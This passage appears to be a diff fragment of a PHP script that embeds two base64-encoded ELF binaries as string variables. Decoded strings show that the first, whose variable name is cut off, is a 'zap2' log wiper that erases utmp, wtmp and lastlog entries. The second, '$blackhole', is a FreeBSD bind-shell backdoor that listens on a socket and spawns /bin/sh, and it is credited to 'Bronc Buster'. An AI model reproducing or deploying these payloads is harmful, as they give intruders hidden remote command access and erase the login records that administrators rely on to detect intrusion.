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 +BAAAAEiBBAgFAAAAdIIECAYAAACUgQQICgAAAIYAAAALAAAAEAAAABUAAAAAAAAAAwAAAJCaBAgC +AAAAWAAAABQAAAARAAAAFwAAAECDBAgRAAAAOIMECBIAAAAIAAAAEwAAAAgAAAD+//9vGIMECP// +/28BAAAA8P//b/qCBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAD/////AAAAAP////8AAAAAAAAAALSZBAgAAAAAAAAAAMaDBAjWgwQI5oMECPaDBAgGhAQI +FoQECCaEBAg2hAQIRoQECFaEBAhmhAQIAAAAAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA +R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH +Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD +QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRl +cnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUu +dmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmRh +dGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmpjcgAuZ290AC5ic3MALmNvbW1l +bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAA +FIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAA +AAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAEwAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsA +AAACAAAAlIEECJQBAADgAAAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAAHSCBAh0AgAAhgAA +AAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAAD6ggQI+gIAABwAAAAEAAAAAAAAAAIAAAACAAAA +VAAAAP7//28CAAAAGIMECBgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAADiDBAg4 +AwAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAABAgwQIQAMAAFgAAAAEAAAACwAAAAQA +AAAIAAAAdQAAAAEAAAAGAAAAmIMECJgDAAAXAAAAAAAAAAAAAAAEAAAAAAAAAHAAAAABAAAABgAA +ALCDBAiwAwAAwAAAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAABwhAQIcAQAANAEAAAAAAAA +AAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAQIkECEAJAAAbAAAAAAAAAAAAAAAEAAAAAAAAAIcAAAAB +AAAAAgAAAFyJBAhcCQAARwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAMAAACkmQQIpAkAAAwA +AAAAAAAAAAAAAAQAAAAAAAAAlQAAAAEAAAACAAAAsJkECLAJAAAEAAAAAAAAAAAAAAAEAAAAAAAA +AJ8AAAAGAAAAAwAAALSZBAi0CQAAyAAAAAUAAAAAAAAABAAAAAgAAACoAAAAAQAAAAMAAAB8mgQI +fAoAAAgAAAAAAAAAAAAAAAQAAAAAAAAArwAAAAEAAAADAAAAhJoECIQKAAAIAAAAAAAAAAAAAAAE +AAAAAAAAALYAAAABAAAAAwAAAIyaBAiMCgAABAAAAAAAAAAAAAAABAAAAAAAAAC7AAAAAQAAAAMA +AACQmgQIkAoAADwAAAAAAAAAAAAAAAQAAAAEAAAAwAAAAAgAAAADAAAAzJoECMwKAAAIAAAAAAAA +AAAAAAAEAAAAAAAAAMUAAAABAAAAAAAAAAAAAADMCgAAqAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA +AwAAAAAAAAAAAAAAdAsAAM4AAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAHwQAAAg +BQAAGgAAACsAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAACcFQAA9gIAAAAAAAAAAAAAAQAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEE +CAAAAAADAAMAAAAAAJSBBAgAAAAAAwAEAAAAAAB0ggQIAAAAAAMABQAAAAAA+oIECAAAAAADAAYA +AAAAABiDBAgAAAAAAwAHAAAAAAA4gwQIAAAAAAMACAAAAAAAQIMECAAAAAADAAkAAAAAAJiDBAgA +AAAAAwAKAAAAAACwgwQIAAAAAAMACwAAAAAAcIQECAAAAAADAAwAAAAAAECJBAgAAAAAAwANAAAA +AABciQQIAAAAAAMADgAAAAAApJkECAAAAAADAA8AAAAAALCZBAgAAAAAAwAQAAAAAAC0mQQIAAAA +AAMAEQAAAAAAfJoECAAAAAADABIAAAAAAISaBAgAAAAAAwATAAAAAACMmgQIAAAAAAMAFAAAAAAA +kJoECAAAAAADABUAAAAAAMyaBAgAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwAAAAAAAAAAAAAAAAAD +ABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgABAAAAlIQECAAAAAACAAwAEQAAAAAA +AAAAAAAABADx/xwAAAB8mgQIAAAAAAEAEgAqAAAAhJoECAAAAAABABMAOAAAAIyaBAgAAAAAAQAU +AEUAAACsmQQIAAAAAAEADwBJAAAAzJoECAEAAAABABYAVQAAALiEBAgAAAAAAgAMAGsAAAD0hAQI +AAAAAAIADAARAAAAAAAAAAAAAAAEAPH/dwAAAICaBAgAAAAAAQASAIQAAACImgQIAAAAAAEAEwCR +AAAAsJkECAAAAAABABAAnwAAAIyaBAgAAAAAAQAUAKsAAAAciQQIAAAAAAIADADBAAAAAAAAAAAA +AAAEAPH/yAAAALSZBAgAAAAAEQARANEAAADQmgQIBAAAABEAFgDTAAAAAAAAAHwAAAASAAAA5AAA +AAAAAABxAAAAEgAAAPUAAABciQQIBAAAABEADgD8AAAApJkECAAAAAAQAvH/DQEAACCFBAjhAAAA +EgAMABcBAAComQQIAAAAABECDwAkAQAA2IgECEQAAAASAAwANAEAAJiDBAgAAAAAEgAKADoBAABw +hAQIAAAAABIADABBAQAAAAAAAB0AAAASAAAAUwEAAAAAAACsAAAAEgAAAGYBAACkmQQIAAAAABAC +8f95AQAAkIgECEgAAAASAAwAiQEAAMyaBAgAAAAAEADx/5UBAAAaiAQIcwAAABIADACaAQAAAAAA +ANUAAAASAAAAtwEAAKSZBAgAAAAAEALx/8gBAACkmQQIAAAAACAADwDTAQAAAAAAACkAAAASAAAA +5QEAAECJBAgAAAAAEgANAOsBAAAAAAAAPAAAABIAAAD8AQAApJkECAAAAAAQAvH/EAIAAAAAAAB8 +AAAAEgAAACACAAAAAAAAMAAAABIAAAAxAgAAAAAAAP8AAAASAAAARQIAAMyaBAgAAAAAEADx/0wC +AACQmgQIAAAAABEAFQBiAgAA1JoECAAAAAAQAPH/ZwIAAKSZBAgAAAAAEALx/3oCAABgiQQIBAAA +ABEADgCJAgAAAYYECEwBAAASAAwAkwIAAKSZBAgAAAAAEAAPAKACAAAAAAAAAAAAACAAAAC0AgAA +pJkECAAAAAAQAvH/ygIAAAAAAAB8AAAAEgAAANoCAABNhwQIzQAAABIADADnAgAAAAAAAAAAAAAg +AAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1Rf +XwBfX0pDUl9MSVNUX18AcC4wAGNvbXBsZXRlZC4xAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFt +ZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5E +X18AX19kb19nbG9iYWxfY3RvcnNfYXV4AHphcDIuYwBfRFlOQU1JQwBmAHdyaXRlQEBHTElCQ18y +LjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAX19maW5pX2FycmF5X2VuZABraWxsX3V0bXAAX19k +c29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfaW5pdABfc3RhcnQAc3RybGVuQEBHTElCQ18yLjAA +c3RybmNtcEBAR0xJQkNfMi4wAF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19i +c3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9l +bmQAZGF0YV9zdGFydABwcmludGZAQEdMSUJDXzIuMABfZmluaQBsc2Vla0BAR0xJQkNfMi4wAF9f +cHJlaW5pdF9hcnJheV9lbmQAb3BlbkBAR0xJQkNfMi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHdu +YW1AQEdMSUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2Fy +cmF5X3N0YXJ0AF9JT19zdGRpbl91c2VkAGtpbGxfd3RtcABfX2RhdGFfc3RhcnQAX0p2X1JlZ2lz +dGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAcmVhZEBAR0xJQkNfMi4wAGtpbGxfbGFz +dGxvZwBfX2dtb25fc3RhcnRfXwA="; + +$blackhole="f0VMRgEBAQkAAAAAAAAAAAIAAwABAAAARIYECDQAAACgDQAAAAAAADQAIAAGACgAGAAVAAYAAAA0 +AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBkAAAAZAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIAAsAAAALAAAFAAAAABAAAAEAAAAACwAAAJsECACbBAgEAQAAIAEA +AAYAAAAAEAAAAgAAABALAAAQmwQIEJsECJgAAACYAAAABgAAAAQAAAAEAAAAEAEAABCBBAgQgQQI +GAAAABgAAAAEAAAABAAAAC91c3IvbGliZXhlYy9sZC1lbGYuc28uMQAAAAAIAAAABAAAAAEAAABG +cmVlQlNEAESCBwARAAAAHQAAAAAAAAAWAAAAFwAAABwAAAAaAAAAAAAAAA4AAAARAAAAFAAAABsA +AAAIAAAAEwAAAAEAAAAZAAAADAAAABUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA +AAUAAAACAAAAAAAAAAAAAAAHAAAAAAAAAAYAAAALAAAAAAAAAAoAAAAAAAAADQAAAAAAAAAQAAAA +AAAAAA8AAAASAAAAAAAAABgAAAADAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAESFBAgA +AAAAEgAAABIAAABUhQQILwAAABIAAAAZAAAAEJsECAAAAAARAPH/IgAAAGSFBAh9AAAAEgAAACgA +AAB0hQQIAAAAABIAAAAtAAAAhIUECAAAAAASAAAANAAAAJSFBAgAAAAAEgAAADoAAACkhQQIMAAA +ABIAAAA/AAAAKIUECAAAAAASAAcARQAAALSFBAgAAAAAEgAAAEwAAAAcnAQIBAAAABEAEgBUAAAA +xIUECAAAAAASAAAAWQAAAAAAAAAAAAAAIAAAAOkAAAAgnAQIAAAAABAA8f9xAAAAAJsECAQAAAAR +AAwAfAAAANSFBAhwAAAAEgAAAIMAAADkhQQIAAAAABIAAACKAAAA9IUECAAAAAASAAAA3AAAAASc +BAgAAAAAEADx/48AAADwiQQIAAAAABIACgCVAAAABIYECEwBAAASAAAA1QAAAAScBAgAAAAAEADx +/5wAAAC4mwQIAAAAABEA8f/oAAAAIJwECAAAAAAQAPH/lwAAABSGBAhbAAAAEgAAALIAAAAkhgQI +AAAAABIAAAC5AAAAAAAAAAAAAAAgAAAAzwAAADSGBAgAAAAAEgAAAABsaWJjLnNvLjQAc3RyY3B5 +AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABiemVybwBzZW5kAF9pbml0AGFjY2Vw +dABlbnZpcm9uAGJpbmQAX19kZXJlZ2lzdGVyX2ZyYW1lX2luZm8AX19wcm9nbmFtZQBzaWduYWwA +bGlzdGVuAGZvcmsAX2ZpbmkAYXRleGl0AF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBzdHJsZW4AX19y +ZWdpc3Rlcl9mcmFtZV9pbmZvAGNsb3NlAF9lZGF0YQBfX2Jzc19zdGFydABfZW5kAAAAAMSbBAgH +AQAAyJsECAcCAADMmwQIBwQAANCbBAgHBQAA1JsECAcGAADYmwQIBwcAANybBAgHCAAA4JsECAcK +AADkmwQIBwwAAOibBAgHEAAA7JsECAcRAADwmwQIBxIAAPSbBAgHFQAA+JsECAcZAAD8mwQIBxoA +AACcBAgHHAAA6AsCAADojgQAAMMA/zW8mwQI/yXAmwQIAAAAAP8lxJsECGgAAAAA6eD/////Jcib +BAhoCAAAAOnQ/////yXMmwQIaBAAAADpwP////8l0JsECGgYAAAA6bD/////JdSbBAhoIAAAAOmg +/////yXYmwQIaCgAAADpkP////8l3JsECGgwAAAA6YD/////JeCbBAhoOAAAAOlw/////yXkmwQI +aEAAAADpYP////8l6JsECGhIAAAA6VD/////JeybBAhoUAAAAOlA/////yXwmwQIaFgAAADpMP// +//8l9JsECGhgAAAA6SD/////JfibBAhoaAAAAOkQ/////yX8mwQIaHAAAADpAP////8lAJwECGh4 +AAAA6fD+//9VieWD7AxXVlOJ0o11CIte/I18ngSJPRycBAiF234pg30IAHQji0UIowCbBAiAOAB0 +Fon2gDgvdQmNSAGJDQCbBAhAgDgAdey4EJsECIXAdAyDxPRS6Gb///+DxBCDxPRo8IkECOhW//// +6HX+//+D5PCD7BiJXCQAiXQkBIl8JAjomgAAAIlEJADoQf///41l6FteX8nDkFWJ5YPsCIM9CJsE +CAB1QOsUjXYAgwUEmwQIBKEEmwQIi0D8/9ChBJsECIM4AHXluAAAAACFwHQNg8T0aAybBAjo33j7 +98cFCJsECAEAAADJw412AFWJ5YPsCMnDVYnlg+wIuAAAAACFwHQSg8T4aAScBAhoDJsECOinePv3 +ycOQVYnlg+wIycNVieWD7EjHRfwgigQIx0X4QIoECMdF9ICKBAjGRdkCuNsaAACG4GaJRdrHRdwA +AAAAg8T4agiNRdiNUAhS6O79//+DxBCDxPhoq4oECItFDIsQUuiI/f//g8QQg8T4agFqFOgJ/v// +g8QQg8T8agBqAWoC6Kj9//+DxBCJwIlF8IN98AB9HoPE9IPE9GiyigQI6Fr9//+DxBCJwFDoD/7/ +/4PEEIPE/GoQjUXYUItF8FDoqv3//4PEEInAhcB9IYPE9IPE9GjAigQI6CH9//+DxBCJwFDo1v3/ +/4PEEI12AIPE+GoFi0XwUOiS/f//g8QQicCFwH0hg8T0g8T0aMyKBAjo6fz//4PEEInAUOie/f// +g8QQjXYAx0XoEAAAAJCDxPyNRehQjUXIUItF8FDoHP3//4PEEInAiUXsg33sAH0eg8T0g8T0aNqK +BAjonvz//4PEEInAUOhT/f//g8QQ6Cv9//+JwIXAD4TVAAAAagCDxPSLRfxQ6EP9//+DxBCJwFCL +RfxQi0XsUOiw/P//g8QQagCDxPSLRfhQ6B/9//+DxBCJwFCLRfhQi0XsUOiM/P//g8QQagCDxPSL +RfRQ6Pv8//+DxBCJwFCLRfRQi0XsUOho/P//g8QQg8T4agCLRexQ6Cf8//+DxBCDxPhqAYtF7FDo +Fvz//4PEEIPE+GoCi0XsUOgF/P//g8QQg8T8agBo54oECGjnigQI6N77//+DxBCDxPSLRexQ6J/8 +//+DxBCDxPRqAOhy/P//g8QQjXYAg8T0i0XsUOiA/P//g8QQ6cj+///Jw4n2VYnlg+wUU7uomwQI +gz2omwQI/3QPjXYAiwP/0IPD/IM7/3X0W8nDkFWJ5YPsCMnD6Of8///DAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkNvbm5lY3RlZCEKCgAAAAAAAAAAAAAAAAAAAAAA +AABUaGlzIGZpbmUgdG9vbCBjb2RlZCBieSBCcm9uYyBCdXN0ZXIKAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAUGxlYXNlIGVudGVyIGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAGFwYWNo +ZQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJvcgoAQWNjZXB0IGVycm9yAC9i +aW4vc2gAAAAAAAAAAAAAAAAAAAAAAAAAigQItJsECAAAAAAAAAAAAQAAAAEAAAAMAAAAKIUECA0A +AADwiQQIBAAAACiBBAgFAAAAuIMECAYAAADogQQICgAAAO0AAAALAAAAEAAAABUAAAAAAAAAAwAA +ALibBAgCAAAAgAAAABQAAAARAAAAFwAAAKiEBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAEJsECAAAAAAAAAAASoUECFqFBAhq +hQQIeoUECIqFBAiahQQIqoUECLqFBAjKhQQI2oUECOqFBAj6hQQICoYECBqGBAgqhgQIOoYECABH +Q0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAAR0NDOiAoR05VKSBjIDIuOTUu +NCAyMDAyMDMyMCBbRnJlZUJTRF0AAEdDQzogKEdOVSkgYyAyLjk1LjQgMjAwMjAzMjAgW0ZyZWVC +U0RdAABHQ0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAIAAAAAAAAAAEAAAAw +MS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEA +AAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRh +ZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0 +YQAuZGF0YQAuZWhfZnJhbWUALmR5bmFtaWMALmN0b3JzAC5kdG9ycwAuZ290AC5ic3MALmNvbW1l +bnQALm5vdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEA +AAACAAAA9IAECPQAAAAZAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAABCBBAgQAQAAGAAA +AAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAAAogQQIKAEAAMAAAAAEAAAAAAAAAAQAAAAEAAAA +NwAAAAsAAAACAAAA6IEECOgBAADQAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAALiDBAi4 +AwAA7QAAAAAAAAAAAAAAAQAAAAAAAABHAAAACQAAAAIAAACohAQIqAQAAIAAAAAEAAAACAAAAAQA +AAAIAAAAUAAAAAEAAAAGAAAAKIUECCgFAAALAAAAAAAAAAAAAAAEAAAAAAAAAEsAAAABAAAABgAA +ADSFBAg0BQAAEAEAAAAAAAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAABEhgQIRAYAAKwDAAAAAAAA +AAAAAAQAAAAAAAAAXAAAAAEAAAAGAAAA8IkECPAJAAAGAAAAAAAAAAAAAAAEAAAAAAAAAGIAAAAB +AAAAAgAAAACKBAgACgAAAAEAAAAAAAAAAAAAIAAAAAAAAABqAAAAAQAAAAMAAAAAmwQIAAsAAAwA +AAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEAAAADAAAADJsECAwLAAAEAAAAAAAAAAAAAAAEAAAAAAAA +AHoAAAAGAAAAAwAAABCbBAgQCwAAmAAAAAUAAAAAAAAABAAAAAgAAACDAAAAAQAAAAMAAAComwQI +qAsAAAgAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAEAAAADAAAAsJsECLALAAAIAAAAAAAAAAAAAAAE +AAAAAAAAAJEAAAABAAAAAwAAALibBAi4CwAATAAAAAAAAAAAAAAABAAAAAQAAACWAAAACAAAAAMA +AAAEnAQIBAwAABwAAAAAAAAAAAAAAAQAAAAAAAAAmwAAAAEAAAAAAAAAAAAAAAQMAACgAAAAAAAA +AAAAAAABAAAAAAAAAKQAAAAHAAAAAAAAAAAAAACkDAAAUAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA +AwAAAAAAAAAAAAAA9AwAAKoAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAGARAADQ +BAAAFwAAAC8AAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAAAwFgAA9gEAAAAAAAAAAAAAAQAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPSABAgAAAAAAwABAAAAAAAQgQQIAAAAAAMAAgAAAAAAKIEE +CAAAAAADAAMAAAAAAOiBBAgAAAAAAwAEAAAAAAC4gwQIAAAAAAMABQAAAAAAqIQECAAAAAADAAYA +AAAAACiFBAgAAAAAAwAHAAAAAAA0hQQIAAAAAAMACAAAAAAARIYECAAAAAADAAkAAAAAAPCJBAgA +AAAAAwAKAAAAAAAAigQIAAAAAAMACwAAAAAAAJsECAAAAAADAAwAAAAAAAybBAgAAAAAAwANAAAA +AAAQmwQIAAAAAAMADgAAAAAAqJsECAAAAAADAA8AAAAAALCbBAgAAAAAAwAQAAAAAAC4mwQIAAAA +AAMAEQAAAAAABJwECAAAAAADABIAAAAAAAAAAAAAAAAAAwATAAAAAAAAAAAAAAAAAAMAFAAAAAAA +AAAAAAAAAAADABUAAAAAAAAAAAAAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwABAAAAAAAAAAAAAAAE +APH/DAAAANyGBAgAAAAAAAAJABsAAAAEmwQIAAAAAAEADAAfAAAAsJsECAAAAAABABAALQAAAAib +BAgAAAAAAQAMADkAAADchgQIAAAAAAIACQBPAAAADJsECAAAAAABAA0AYgAAADCHBAgAAAAAAgAJ +AG0AAAAEnAQIGAAAAAEAEgB3AAAAOIcECAAAAAACAAkAgwAAAFyHBAgAAAAAAgAJAI4AAAAMmwQI +AAAAAAEADACcAAAAqJsECAAAAAABAA8AAQAAAAAAAAAAAAAABADx/wwAAADAiQQIAAAAAAAACQCq +AAAAwIkECAAAAAACAAkAwAAAAKybBAgAAAAAAQAPAIMAAADoiQQIAAAAAAIACQCOAAAADJsECAAA +AAABAAwAzQAAALSbBAgAAAAAAQAQANoAAAAMmwQIAAAAAAEADQDoAAAAAAAAAAAAAAAEAPH/DAAA +AGSHBAgAAAAAAAAJAP8AAABEhQQIAAAAABIAAAAGAQAAVIUECC8AAAASAAAADQEAABCbBAgAAAAA +EQDx/xYBAABkhQQIfQAAABIAAAAcAQAAdIUECAAAAAASAAAAIQEAAISFBAgAAAAAEgAAACgBAACU +hQQIAAAAABIAAAAuAQAApIUECDAAAAASAAAAMwEAACiFBAgAAAAAEgAHADkBAAC0hQQIAAAAABIA +AABAAQAAHJwECAQAAAARABIASAEAAMSFBAgAAAAAEgAAAE0BAAAAAAAAAAAAACAAAABlAQAAIJwE +CAAAAAAQAPH/aQEAAACbBAgEAAAAEQAMAHQBAABEhgQIlwAAABIACQB7AQAA1IUECHAAAAASAAAA +ggEAAOSFBAgAAAAAEgAAAIkBAAD0hQQIAAAAABIAAACOAQAABJwECAAAAAAQAPH/mgEAAGSHBAha +AgAAEgAJAJ8BAADwiQQIAAAAABIACgClAQAABIYECEwBAAASAAAArAEAAAScBAgAAAAAEADx/7MB +AAC4mwQIAAAAABEA8f/JAQAAIJwECAAAAAAQAPH/zgEAABSGBAhbAAAAEgAAANMBAAAkhgQIAAAA +ABIAAADaAQAAAAAAAAAAAAAgAAAA8AEAADSGBAgAAAAAEgAAAABjcnRzdHVmZi5jAGdjYzJfY29t +cGlsZWQuAHAuMwBfX0RUT1JfTElTVF9fAGNvbXBsZXRlZC40AF9fZG9fZ2xvYmFsX2R0b3JzX2F1 +eABfX0VIX0ZSQU1FX0JFR0lOX18AZmluaV9kdW1teQBvYmplY3QuMTEAZnJhbWVfZHVtbXkAaW5p +dF9kdW1teQBmb3JjZV90b19kYXRhAF9fQ1RPUl9MSVNUX18AX19kb19nbG9iYWxfY3RvcnNfYXV4 +AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBibGFja2hvbGV1cGxvYWRy +ZWFkeS5jAHN0cmNweQBwcmludGYAX0RZTkFNSUMAZXhlY2wAZHVwMgBzb2NrZXQAYnplcm8Ac2Vu +ZABfaW5pdABhY2NlcHQAZW52aXJvbgBiaW5kAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZvAGVuZABf +X3Byb2duYW1lAF9zdGFydABzaWduYWwAbGlzdGVuAGZvcmsAX19ic3Nfc3RhcnQAbWFpbgBfZmlu +aQBhdGV4aXQAX2VkYXRhAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfZW5kAGV4aXQAc3RybGVuAF9f +cmVnaXN0ZXJfZnJhbWVfaW5mbwBjbG9zZQA="; + 